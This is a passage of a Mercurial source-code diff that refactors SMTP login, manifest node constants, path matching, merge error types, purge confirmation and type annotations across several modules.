pycompat.TYPE_CHECKING: @@ -139,7 +140,7 @@ defaultport = 465 else: defaultport = 25 - mailport = util.getport(ui.config(b'smtp', b'port', defaultport)) + mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport)) ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport)) s.connect(host=mailhost, port=mailport) if starttls: @@ -150,6 +151,32 @@ if starttls or smtps: ui.note(_(b'(verifying remote certificate)\n')) sslutil.validatesocket(s.sock) + + try: + _smtp_login(ui, s, mailhost, mailport) + except smtplib.SMTPException as inst: + raise error.Abort(stringutil.forcebytestr(inst)) + + def send(sender, recipients, msg): + try: + return s.sendmail(sender, recipients, msg) + except smtplib.SMTPRecipientsRefused as inst: + recipients = [r[1] for r in inst.recipients.values()] + raise error.Abort(b'\n' + b'\n'.join(recipients)) + except smtplib.SMTPException as inst: + raise error.Abort(stringutil.forcebytestr(inst)) + + return send + + +def _smtp_login(ui, smtp, mailhost, mailport): + """A hook for the keyring extension to perform the actual SMTP login. + + An already connected SMTP object of the proper type is provided, based on + the current configuration. The host and port to which the connection was + established are provided for accessibility, since the SMTP object doesn't + provide an accessor. ``smtplib.SMTPException`` is raised on error. + """ username = ui.config(b'smtp', b'username') password = ui.config(b'smtp', b'password') if username: @@ -162,21 +189,7 @@ if username and password: ui.note(_(b'(authenticating to mail server as %s)\n') % username) username = encoding.strfromlocal(username) - try: - s.login(username, password) - except smtplib.SMTPException as inst: - raise error.Abort(stringutil.forcebytestr(inst)) - - def send(sender, recipients, msg): - try: - return s.sendmail(sender, recipients, msg) - except smtplib.SMTPRecipientsRefused as inst: - recipients = [r[1] for r in inst.recipients.values()] - raise error.Abort(b'\n' + b'\n'.join(recipients)) - except smtplib.SMTPException as inst: - raise error.Abort(inst) - - return send + smtp.login(username, password) def _sendmail(ui, sender, recipients, msg): @@ -207,17 +220,16 @@ def _mbox(mbox, sender, recipients, msg): '''write mails to mbox''' - fp = open(mbox, b'ab+') - # Should be time.asctime(), but Windows prints 2-characters day - # of month instead of one. Make them print the same thing. - date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) - fp.write( - b'From %s %s\n' - % (encoding.strtolocal(sender), encoding.strtolocal(date)) - ) - fp.write(msg) - fp.write(b'\n\n') - fp.close() + with open(mbox, b'ab+') as fp: + # Should be time.asctime(), but Windows prints 2-characters day + # of month instead of one. Make them print the same thing. + date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) + fp.write( + b'From %s %s\n' + % (encoding.strtolocal(sender), encoding.strtolocal(date)) + ) + fp.write(msg) + fp.write(b'\n\n') def connect(ui, mbox=None): diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1,6 +1,6 @@ # manifest.py - manifest revision class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -792,8 +792,9 @@ @interfaceutil.implementer(repository.imanifestdict) class treemanifest(object): - def __init__(self, dir=b'', text=b''): + def __init__(self, nodeconstants, dir=b'', text=b''): self._dir = dir + self.nodeconstants = nodeconstants self._node = nullid self._loadfunc = _noop self._copyfunc = _noop @@ -1051,7 +1052,9 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].__setitem__(subpath, n) else: # manifest nodes are either 20 bytes or 32 bytes, @@ -1078,14 +1081,16 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].setflag(subpath, flags) else: self._flags[f] = flags self._dirty = True def copy(self): - copy = treemanifest(self._dir) + copy = treemanifest(self.nodeconstants, self._dir) copy._node = self._node copy._dirty = self._dirty if self._copyfunc is _noop: @@ -1215,7 +1220,7 @@ visit = match.visitchildrenset(self._dir[:-1]) if visit == b'all': return self.copy() - ret = treemanifest(self._dir) + ret = treemanifest(self.nodeconstants, self._dir) if not visit: return ret @@ -1272,7 +1277,7 @@ m2 = m2._matches(match) return m1.diff(m2, clean=clean) result = {} - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def _iterativediff(t1, t2, stack): """compares two tree manifests and append new tree-manifests which @@ -1368,7 +1373,7 @@ self._load() # for consistency; should never have any effect here m1._load() m2._load() - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def getnode(m, d): ld = m._lazydirs.get(d) @@ -1551,6 +1556,7 @@ def __init__( self, + nodeconstants, opener, tree=b'', dirlogcache=None, @@ -1567,6 +1573,7 @@ option takes precedence, so if it is set to True, we ignore whatever value is passed in to the constructor. """ + self.nodeconstants = nodeconstants # During normal operations, we expect to deal with not more than four # revs at a time (such as during commit --amend). When rebasing large # stacks of commits, the number can go up, hence the config knob below. @@ -1610,6 +1617,7 @@ self.index = self._revlog.index self.version = self._revlog.version self._generaldelta = self._revlog._generaldelta + self._revlog.revlog_kind = b'manifest' def _setupmanifestcachehooks(self, repo): """Persist the manifestfulltextcache on lock release""" @@ -1653,7 +1661,11 @@ assert self._treeondisk if d not in self._dirlogcache: mfrevlog = manifestrevlog( - self.opener, d, self._dirlogcache, treemanifest=self._treeondisk + self.nodeconstants, + self.opener, + d, + self._dirlogcache, + treemanifest=self._treeondisk, ) self._dirlogcache[d] = mfrevlog return self._dirlogcache[d] @@ -1704,9 +1716,10 @@ arraytext, deltatext = m.fastdelta(self.fulltextcache[p1], work) cachedelta = self._revlog.rev(p1), deltatext text = util.buffer(arraytext) - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, p1, p2, cachedelta ) + n = self._revlog.node(rev) except FastdeltaUnavailable: # The first parent manifest isn't already loaded or the # manifest implementation doesn't support fastdelta, so @@ -1724,7 +1737,8 @@ arraytext = None else: text = m.text() - n = self._revlog.addrevision(text, transaction, link, p1, p2) + rev = self._revlog.addrevision(text, transaction, link, p1, p2) + n = self._revlog.node(rev) arraytext = bytearray(text) if arraytext is not None: @@ -1765,9 +1779,10 @@ n = m2.node() if not n: - n = self._revlog.addrevision( + rev = self._revlog.addrevision( text, transaction, link, m1.node(), m2.node() ) + n = self._revlog.node(rev) # Save nodeid so parent manifest can calculate its nodeid m.setnode(n) @@ -1822,6 +1837,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -1829,6 +1845,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addgroup( @@ -1836,6 +1853,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -1843,6 +1861,7 @@ deltas, linkmapper, transaction, + alwayscache=alwayscache, addrevisioncb=addrevisioncb, duplicaterevisioncb=duplicaterevisioncb, ) @@ -1909,6 +1928,7 @@ they receive (i.e. tree or flat or lazily loaded, etc).""" def __init__(self, opener, repo, rootstore, narrowmatch): + self.nodeconstants = repo.nodeconstants usetreemanifest = False cachesize = 4 @@ -1947,7 +1967,7 @@ if not self._narrowmatch.always(): if not self._narrowmatch.visitdir(tree[:-1]): - return excludeddirmanifestctx(tree, node) + return excludeddirmanifestctx(self.nodeconstants, tree, node) if tree: if self._rootstore._treeondisk: if verify: @@ -2110,7 +2130,7 @@ def __init__(self, manifestlog, dir=b''): self._manifestlog = manifestlog self._dir = dir - self._treemanifest = treemanifest() + self._treemanifest = treemanifest(manifestlog.nodeconstants) def _storage(self): return self._manifestlog.getstorage(b'') @@ -2160,17 +2180,19 @@ narrowmatch = self._manifestlog._narrowmatch if not narrowmatch.always(): if not narrowmatch.visitdir(self._dir[:-1]): - return excludedmanifestrevlog(self._dir) + return excludedmanifestrevlog( + self._manifestlog.nodeconstants, self._dir + ) return self._manifestlog.getstorage(self._dir) def read(self): if self._data is None: store = self._storage() if self._node == nullid: - self._data = treemanifest() + self._data = treemanifest(self._manifestlog.nodeconstants) # TODO accessing non-public API elif store._treeondisk: - m = treemanifest(dir=self._dir) + m = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) def gettext(): return store.revision(self._node) @@ -2190,7 +2212,9 @@ text = store.revision(self._node) arraytext = bytearray(text) store.fulltextcache[self._node] = arraytext - self._data = treemanifest(dir=self._dir, text=text) + self._data = treemanifest( + self._manifestlog.nodeconstants, dir=self._dir, text=text + ) return self._data @@ -2227,7 +2251,7 @@ r0 = store.deltaparent(store.rev(self._node)) m0 = self._manifestlog.get(self._dir, store.node(r0)).read() m1 = self.read() - md = treemanifest(dir=self._dir) + md = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) for f, ((n0, fl0), (n1, fl1)) in pycompat.iteritems(m0.diff(m1)): if n1: md[f] = n1 @@ -2270,8 +2294,8 @@ whose contents are unknown. """ - def __init__(self, dir, node): - super(excludeddir, self).__init__(dir) + def __init__(self, nodeconstants, dir, node): + super(excludeddir, self).__init__(nodeconstants, dir) self._node = node # Add an empty file, which will be included by iterators and such, # appearing as the directory itself (i.e. something like "dir/") @@ -2290,12 +2314,13 @@ class excludeddirmanifestctx(treemanifestctx): """context wrapper for excludeddir - see that docstring for rationale""" - def __init__(self, dir, node): + def __init__(self, nodeconstants, dir, node): + self.nodeconstants = nodeconstants self._dir = dir self._node = node def read(self): - return excludeddir(self._dir, self._node) + return excludeddir(self.nodeconstants, self._dir, self._node) def readfast(self, shallow=False): # special version of readfast since we don't have underlying storage @@ -2317,7 +2342,8 @@ outside the narrowspec. """ - def __init__(self, dir): + def __init__(self, nodeconstants, dir): + self.nodeconstants = nodeconstants self._dir = dir def __len__(self): diff --git a/mercurial/match.py b/mercurial/match.py --- a/mercurial/match.py +++ b/mercurial/match.py @@ -1,12 +1,13 @@ # match.py - filename matching # -# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2008, 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. from __future__ import absolute_import, print_function +import bisect import copy import itertools import os @@ -798,14 +799,38 @@ def visitdir(self, dir): return dir in self._dirs + @propertycache + def _visitchildrenset_candidates(self): + """A memoized set of candidates for visitchildrenset.""" + return self._fileset | self._dirs - {b''} + + @propertycache + def _sorted_visitchildrenset_candidates(self): + """A memoized sorted list of candidates for visitchildrenset.""" + return sorted(self._visitchildrenset_candidates) + def visitchildrenset(self, dir): if not self._fileset or dir not in self._dirs: return set() - candidates = self._fileset | self._dirs - {b''} - if dir != b'': + if dir == b'': + candidates = self._visitchildrenset_candidates + else: + candidates = self._sorted_visitchildrenset_candidates d = dir + b'/' - candidates = {c[len(d) :] for c in candidates if c.startswith(d)} + # Use bisect to find the first element potentially starting with d + # (i.e. >= d). This should always find at least one element (we'll + # assert later if this is not the case). + first = bisect.bisect_left(candidates, d) + # We need a representation of the first element that is > d that + # does not start with d, so since we added a `/` on the end of dir, + # we'll add whatever comes after slash (we could probably assume + # that `0` is after `/`, but let's not) to the end of dir instead. + dnext = dir + encoding.strtolocal(chr(ord(b'/') + 1)) + # Use bisect to find the first element >= d_next + last = bisect.bisect_left(candidates, dnext, lo=first) + dlen = len(d) + candidates = {c[dlen:] for c in candidates[first:last]} # self._dirs includes all of the directories, recursively, so if # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo', # 'foo/bar' in it. Thus we can safely ignore a candidate that has a diff --git a/mercurial/mdiff.py b/mercurial/mdiff.py --- a/mercurial/mdiff.py +++ b/mercurial/mdiff.py @@ -1,6 +1,6 @@ # mdiff.py - diff and patch routines for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1,6 +1,6 @@ # merge.py - directory-level update/merge handling for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -234,7 +234,7 @@ else: warn(_(b"%s: untracked file differs\n") % f) if abortconflicts: - raise error.Abort( + raise error.StateError( _( b"untracked files in working directory " b"differ from files in requested revision" @@ -342,7 +342,7 @@ for f in pmmf: fold = util.normcase(f) if fold in foldmap: - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and %s") % (f, foldmap[fold]) ) @@ -353,7 +353,7 @@ for fold, f in sorted(foldmap.items()): if fold.startswith(foldprefix) and not f.startswith(unfoldprefix): # the folded prefix matches but actual casing is different - raise error.Abort( + raise error.StateError( _(b"case-folding collision between %s and directory of %s") % (lastfull, f) ) @@ -505,7 +505,9 @@ if invalidconflicts: for p in invalidconflicts: repo.ui.warn(_(b"%s: is both a file and a directory\n") % p) - raise error.Abort(_(b"destination manifest contains path conflicts")) + raise error.StateError( + _(b"destination manifest contains path conflicts") + ) def _filternarrowactions(narrowmatch, branchmerge, mresult): @@ -1696,6 +1698,7 @@ tocomplete = [] for f, args, msg in mergeactions: repo.ui.debug(b" %s: %s -> m (premerge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f) if f == b'.hgsubstate': # subrepo states need updating subrepoutil.submerge( @@ -1711,6 +1714,7 @@ # merge for f, args, msg in tocomplete: repo.ui.debug(b" %s: %s -> m (merge)\n" % (f, msg)) + ms.addcommitinfo(f, {b'merged': b'yes'}) progress.increment(item=f, total=numupdates) ms.resolve(f, wctx) @@ -1919,10 +1923,10 @@ ### check phase if not overwrite: if len(pl) > 1: - raise error.Abort(_(b"outstanding uncommitted merge")) + raise error.StateError(_(b"outstanding uncommitted merge")) ms = wc.mergestate() - if list(ms.unresolved()): - raise error.Abort( + if ms.unresolvedcount(): + raise error.StateError( _(b"outstanding merge conflicts"), hint=_(b"use 'hg resolve' to resolve"), ) @@ -2008,7 +2012,7 @@ if mresult.hasconflicts(): msg = _(b"conflicting changes") hint = _(b"commit or update --clean to discard changes") - raise error.Abort(msg, hint=hint) + raise error.StateError(msg, hint=hint) # Prompt and create actions. Most of this is in the resolve phase # already, but we can't handle .hgsubstate in filemerge or @@ -2325,6 +2329,7 @@ removefiles=True, abortonerror=False, noop=False, + confirm=False, ): """Purge the working directory of untracked files. @@ -2345,6 +2350,8 @@ ``noop`` controls whether to actually remove files. If not defined, actions will be taken. + ``confirm`` ask confirmation before actually removing anything. + Returns an iterable of relative paths in the working directory that were or would be removed. """ @@ -2372,6 +2379,35 @@ status = repo.status(match=matcher, ignored=ignored, unknown=unknown) + if confirm: + nb_ignored = len(status.ignored) + nb_unkown = len(status.unknown) + if nb_unkown and nb_ignored: + msg = _(b"permanently delete %d unkown and %d ignored files?") + msg %= (nb_unkown, nb_ignored) + elif nb_unkown: + msg = _(b"permanently delete %d unkown files?") + msg %= nb_unkown + elif nb_ignored: + msg = _(b"permanently delete %d ignored files?") + msg %= nb_ignored + elif removeemptydirs: + dir_count = 0 + for f in directories: + if matcher(f) and not repo.wvfs.listdir(f): + dir_count += 1 + if dir_count: + msg = _( + b"permanently delete at least %d empty directories?" + ) + msg %= dir_count + else: + # XXX we might be missing directory there + return res + msg += b" (yN)$$ &Yes $$ &No" + if repo.ui.promptchoice(msg, default=1) == 1: + raise error.CanceledError(_(b'removal cancelled')) + if removefiles: for f in sorted(status.unknown + status.ignored): if not noop: diff --git a/mercurial/mergestate.py b/mercurial/mergestate.py --- a/mercurial/mergestate.py +++ b/mercurial/mergestate.py @@ -10,7 +10,7 @@ bin, hex, nullhex, - nullid, + nullrev, ) from . import ( error, @@ -341,7 +341,7 @@ flo = fco.flags() fla = fca.flags() if b'x' in flags + flo + fla and b'l' not in flags + flo + fla: - if fca.node() == nullid and flags != flo: + if fca.rev() == nullrev and flags != flo: if preresolve: self._repo.ui.warn( _( @@ -382,7 +382,6 @@ if merge_ret is None: # If return value of merge is None, then there are no real conflict del self._state[dfile] - self._stateextras.pop(dfile, None) self._dirty = True elif not merge_ret: self.mark(dfile, MERGE_RECORD_RESOLVED) diff --git a/mercurial/mergeutil.py b/mercurial/mergeutil.py --- a/mercurial/mergeutil.py +++ b/mercurial/mergeutil.py @@ -1,6 +1,6 @@ # mergeutil.py - help for merge processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -13,7 +13,7 @@ def checkunresolved(ms): - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.StateError( _(b"unresolved merge conflicts (see 'hg help resolve')") ) diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -18,6 +18,7 @@ from . import ( error, pycompat, + requirements as requirementsmod, util, ) @@ -321,12 +322,12 @@ │ (Some, None) │ OR │🄻 Deleted │ ø │ ø │ │ │🄷 Deleted[1] │ │ │ │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │🄸 No Changes │ │ │ │ - │ (None, Some) │ OR │ ø │🄼 Added │🄽 Merged │ + │ │🄸 No Changes │ │ │ 🄽 Touched │ + │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │ │ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │ │ │ │ │ - │ (Some, Some) │🄺 No Changes │ ø │🄾 Merged │🄿 Merged │ + │ │ │ │ 🄾 Touched │ 🄿 Merged │ + │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │OR 🅂 Touched │ │ │ [3] │ │ (copied?) │ (copied?) │ └──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘ @@ -414,6 +415,7 @@ nice bonus. However do not any of this yet. """ + repo = ctx.repo() md = ChangingFiles() m = ctx.manifest() @@ -453,8 +455,23 @@ # case 🄻 — both deleted the file. md.mark_removed(filename) elif d1[1][0] is not None and d2[1][0] is not None: - # case 🄽 🄾 🄿 - md.mark_merged(filename) + if d1[0][0] is None or d2[0][0] is None: + if any(_find(ma, filename) is not None for ma in mas): + # case 🅀 or 🅁 + md.mark_salvaged(filename) + else: + # case 🄽 🄾 : touched + md.mark_touched(filename) + else: + fctx = repo.filectx(filename, fileid=d1[1][0]) + if fctx.p2().rev() == nullrev: + # case 🅂 + # lets assume we can trust the file history. If the + # filenode is not a merge, the file was not merged. + md.mark_touched(filename) + else: + # case 🄿 + md.mark_merged(filename) copy_candidates.append(filename) else: # Impossible case, the post-merge file status cannot be None on @@ -804,6 +821,21 @@ return encode_files_sidedata(files), files.has_copies_info +def copies_sidedata_computer(repo, revlog, rev, existing_sidedata): + return _getsidedata(repo, rev)[0] + + +def set_sidedata_spec_for_repo(repo): + if requirementsmod.COPIESSDC_REQUIREMENT in repo.requirements: + repo.register_wanted_sidedata(sidedatamod.SD_FILES) + repo.register_sidedata_computer( + b"changelog", + sidedatamod.SD_FILES, + (sidedatamod.SD_FILES,), + copies_sidedata_computer, + ) + + def getsidedataadder(srcrepo, destrepo): use_w = srcrepo.ui.configbool(b'experimental', b'worker.repository-upgrade') if pycompat.iswindows or not use_w: @@ -882,14 +914,14 @@ data = {}, False if util.safehasattr(revlog, b'filteredrevs'): # this is a changelog # Is the data previously shelved ? - sidedata = staging.pop(rev, None) - if sidedata is None: + data = staging.pop(rev, None) + if data is None: # look at the queued result until we find the one we are lookig # for (shelve the other ones) r, data = sidedataq.get() while r != rev: staging[r] = data - r, sidedata = sidedataq.get() + r, data = sidedataq.get() tokens.release() sidedata, has_copies_info = data new_flag = 0 diff --git a/mercurial/minirst.py b/mercurial/minirst.py --- a/mercurial/minirst.py +++ b/mercurial/minirst.py @@ -1,6 +1,6 @@ # minirst.py - minimal reStructuredText parser # -# Copyright 2009, 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009, 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -158,7 +158,7 @@ _optionre = re.compile( br'^(-([a-zA-Z0-9]), )?(--[a-z0-9-]+)' br'((.*) +)(.*)$' ) -_fieldre = re.compile(br':(?![: ])([^:]*)(?<! ):[ ]+(.*)') +_fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)') _definitionre = re.compile(br'[^ ]') _tablere = re.compile(br'(=+\s+)*=+') @@ -229,7 +229,7 @@ m = _fieldre.match(blocks[j][b'lines'][0]) key, rest = m.groups() blocks[j][b'lines'][0] = rest - blocks[j][b'key'] = key + blocks[j][b'key'] = key.replace(br'\:', b':') j += 1 i = j + 1 diff --git a/mercurial/mpatch.c b/mercurial/mpatch.c --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/narrowspec.py b/mercurial/narrowspec.py --- a/mercurial/narrowspec.py +++ b/mercurial/narrowspec.py @@ -329,7 +329,6 @@ trackeddirty = status.modified + status.added clean = status.clean if assumeclean: - assert not trackeddirty clean.extend(lookup) else: trackeddirty.extend(lookup) diff --git a/mercurial/node.py b/mercurial/node.py --- a/mercurial/node.py +++ b/mercurial/node.py @@ -1,6 +1,6 @@ # node.py - basic nodeid manipulation for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -21,29 +21,48 @@ raise TypeError(e) -nullrev = -1 -# In hex, this is '0000000000000000000000000000000000000000' -nullid = b"\0" * 20 -nullhex = hex(nullid) +def short(node): + return hex(node[:6]) + -# Phony node value to stand-in for new files in some uses of -# manifests. -# In hex, this is '2121212121212121212121212121212121212121' -newnodeid = b'!!!!!!!!!!!!!!!!!!!!' -# In hex, this is '3030303030303030303030303030306164646564' -addednodeid = b'000000000000000added' -# In hex, this is '3030303030303030303030306d6f646966696564' -modifiednodeid = b'000000000000modified' +nullrev = -1 -wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} - -# pseudo identifiers for working directory -# (they are experimental, so don't add too many dependencies on them) +# pseudo identifier for working directory +# (experimental, so don't add too many dependencies on it) wdirrev = 0x7FFFFFFF -# In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' -wdirid = b"\xff" * 20 -wdirhex = hex(wdirid) -def short(node): - return hex(node[:6]) +class sha1nodeconstants(object): + nodelen = 20 + + # In hex, this is '0000000000000000000000000000000000000000' + nullid = b"\0" * nodelen + nullhex = hex(nullid) + + # Phony node value to stand-in for new files in some uses of + # manifests. + # In hex, this is '2121212121212121212121212121212121212121' + newnodeid = b'!!!!!!!!!!!!!!!!!!!!' + # In hex, this is '3030303030303030303030303030306164646564' + addednodeid = b'000000000000000added' + # In hex, this is '3030303030303030303030306d6f646966696564' + modifiednodeid = b'000000000000modified' + + wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} + + # pseudo identifier for working directory + # (experimental, so don't add too many dependencies on it) + # In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' + wdirid = b"\xff" * nodelen + wdirhex = hex(wdirid) + + +# legacy starting point for porting modules +nullid = sha1nodeconstants.nullid +nullhex = sha1nodeconstants.nullhex +newnodeid = sha1nodeconstants.newnodeid +addednodeid = sha1nodeconstants.addednodeid +modifiednodeid = sha1nodeconstants.modifiednodeid +wdirfilenodeids = sha1nodeconstants.wdirfilenodeids +wdirid = sha1nodeconstants.wdirid +wdirhex = sha1nodeconstants.wdirhex diff --git a/mercurial/obsolete.py b/mercurial/obsolete.py --- a/mercurial/obsolete.py +++ b/mercurial/obsolete.py @@ -560,10 +560,11 @@ # parents: (tuple of nodeid) or None, parents of predecessors # None is used when no data has been recorded - def __init__(self, svfs, defaultformat=_fm1version, readonly=False): + def __init__(self, repo, svfs, defaultformat=_fm1version, readonly=False): # caches for various obsolescence related cache self.caches = {} self.svfs = svfs + self.repo = repo self._defaultformat = defaultformat self._readonly = readonly @@ -806,7 +807,7 @@ if defaultformat is not None: kwargs['defaultformat'] = defaultformat readonly = not isenabled(repo, createmarkersopt) - store = obsstore(repo.svfs, readonly=readonly, **kwargs) + store = obsstore(repo, repo.svfs, readonly=readonly, **kwargs) if store and readonly: ui.warn( _(b'obsolete feature not enabled but %i markers found!\n') diff --git a/mercurial/parser.py b/mercurial/parser.py --- a/mercurial/parser.py +++ b/mercurial/parser.py @@ -1,6 +1,6 @@ # parser.py - simple top-down operator precedence parser for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pathutil.py b/mercurial/pathutil.py --- a/mercurial/pathutil.py +++ b/mercurial/pathutil.py @@ -15,11 +15,21 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Iterator, + Optional, + ) + + rustdirs = policy.importrust('dirstate', 'Dirs') parsers = policy.importmod('parsers') def _lowerclean(s): + # type: (bytes) -> bytes return encoding.hfsignoreclean(s.lower()) @@ -59,6 +69,7 @@ self.normcase = lambda x: x def __call__(self, path, mode=None): + # type: (bytes, Optional[Any]) -> None """Check the relative path. path may contain a pattern (e.g. foodir/**.txt)""" @@ -119,6 +130,7 @@ self.audited.add(normpath) def _checkfs(self, prefix, path): + # type: (bytes, bytes) -> None """raise exception if a file system backed check fails""" curpath = os.path.join(self.root, prefix) try: @@ -143,6 +155,7 @@ raise error.Abort(msg % (path, pycompat.bytestr(prefix))) def check(self, path): + # type: (bytes) -> bool try: self(path) return True @@ -164,6 +177,7 @@ def canonpath(root, cwd, myname, auditor=None): + # type: (bytes, bytes, bytes, Optional[pathauditor]) -> bytes """return the canonical path of myname, given cwd and root >>> def check(root, cwd, myname): @@ -266,6 +280,7 @@ def normasprefix(path): + # type: (bytes) -> bytes """normalize the specified path as path prefix Returned value can be used safely for "p.startswith(prefix)", @@ -289,6 +304,7 @@ def finddirs(path): + # type: (bytes) -> Iterator[bytes] pos = path.rfind(b'/') while pos != -1: yield path[:pos] @@ -318,6 +334,7 @@ addpath(f) def addpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if base.endswith(b'/'): @@ -330,6 +347,7 @@ dirs[base] = 1 def delpath(self, path): + # type: (bytes) -> None dirs = self._dirs for base in finddirs(path): if dirs[base] > 1: @@ -341,6 +359,7 @@ return iter(self._dirs) def __contains__(self, d): + # type: (bytes) -> bool return d in self._dirs @@ -355,4 +374,4 @@ # rather not let our internals know that we're thinking in posix terms # - instead we'll let them be oblivious. join = posixpath.join -dirname = posixpath.dirname +dirname = posixpath.dirname # type: Callable[[bytes], bytes] diff --git a/mercurial/phases.py b/mercurial/phases.py --- a/mercurial/phases.py +++ b/mercurial/phases.py @@ -127,10 +127,32 @@ util, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Callable, + Dict, + Iterable, + List, + Optional, + Set, + Tuple, + ) + from . import ( + localrepo, + ui as uimod, + ) + + Phaseroots = Dict[int, Set[bytes]] + Phasedefaults = List[ + Callable[[localrepo.localrepository, Phaseroots], Phaseroots] + ] + + _fphasesentry = struct.Struct(b'>i20s') # record phase index -public, draft, secret = range(3) +public, draft, secret = range(3) # type: int archived = 32 # non-continuous for compatibility internal = 96 # non-continuous for compatibility allphases = (public, draft, secret, archived, internal) @@ -154,11 +176,13 @@ def supportinternal(repo): + # type: (localrepo.localrepository) -> bool """True if the internal phase can be used on a repository""" return requirements.INTERNAL_PHASE_REQUIREMENT in repo.requirements def _readroots(repo, phasedefaults=None): + # type: (localrepo.localrepository, Optional[Phasedefaults]) -> Tuple[Phaseroots, bool] """Read phase roots from disk phasedefaults is a list of fn(repo, roots) callable, which are @@ -191,6 +215,7 @@ def binaryencode(phasemapping): + # type: (Dict[int, List[bytes]]) -> bytes """encode a 'phase -> nodes' mapping into a binary stream The revision lists are encoded as (phase, root) pairs. @@ -203,6 +228,7 @@ def binarydecode(stream): + # type: (...) -> Dict[int, List[bytes]] """decode a binary stream into a 'phase -> nodes' mapping The (phase, root) pairs are turned back into a dictionary with @@ -321,6 +347,7 @@ class phasecache(object): def __init__(self, repo, phasedefaults, _load=True): + # type: (localrepo.localrepository, Optional[Phasedefaults], bool) -> None if _load: # Cheap trick to allow shallow-copy without copy module self.phaseroots, self.dirty = _readroots(repo, phasedefaults) @@ -330,6 +357,7 @@ self.opener = repo.svfs def hasnonpublicphases(self, repo): + # type: (localrepo.localrepository) -> bool """detect if there are revisions with non-public phase""" repo = repo.unfiltered() cl = repo.changelog @@ -343,6 +371,7 @@ ) def nonpublicphaseroots(self, repo): + # type: (localrepo.localrepository) -> Set[bytes] """returns the roots of all non-public phases The roots are not minimized, so if the secret revisions are @@ -362,6 +391,8 @@ ) def getrevset(self, repo, phases, subset=None): + # type: (localrepo.localrepository, Iterable[int], Optional[Any]) -> Any + # TODO: finish typing this """return a smartset for the given phases""" self.loadphaserevs(repo) 